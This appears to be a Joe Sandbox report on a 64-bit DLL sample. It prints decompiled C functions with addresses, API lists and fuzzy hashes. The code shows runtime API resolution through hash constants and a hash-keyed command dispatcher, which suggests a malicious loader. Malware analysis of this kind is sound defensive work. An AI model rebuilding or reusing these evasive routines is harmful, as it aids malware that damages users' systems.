                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 520 180001844-180001874 521 18000187a-18000187d 520->521 522 180001a6f-180001a85 520->522 521->522 523 180001883-180001893 call 180007b04 521->523 526 180001899-1800018b3 GetTempPathW 523->526 527 180001a6a 523->527 528 180001a55 526->528 529 1800018b9-1800018cf HeapAlloc 526->529 527->522 530 180001a5a-180001a68 HeapFree 528->530 529->528 531 1800018d5-1800018e3 GetTempPathW 529->531 530->522 532 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 531->532 533 180001916-180001924 HeapFree 531->533 532->533 534 180001927-18000192a 532->534 533->534 534->528 535 180001930-180001935 534->535 536 180001938-18000194f StrChrW 535->536 537 180001951-180001962 536->537 538 180001964-180001972 lstrlenW 536->538 539 180001976-180001979 537->539 538->539 540 1800019a7-1800019ab 539->540 541 18000197b-180001986 539->541 542 1800019b9-1800019c4 540->542 543 1800019ad-1800019b7 540->543 544 180001988-18000198c 541->544 545 18000198e-180001997 541->545 547 1800019c6-1800019e0 call 180009b7c 542->547 548 1800019ef-1800019f2 542->548 546 180001999-18000199c 543->546 544->545 544->546 545->541 545->546 546->540 549 18000199e-1800019a5 546->549 552 180001a3c-180001a53 DeleteFileW HeapFree 547->552 555 1800019e2-1800019e8 547->555 551 1800019f4-180001a0d call 180003698 548->551 548->552 549->540 549->543 551->552 558 180001a0f-180001a36 call 180005bdc HeapFree 551->558 552->530 555->551 557 1800019ea 555->557 557->536 558->552
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32;
                  				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}

























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114();
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
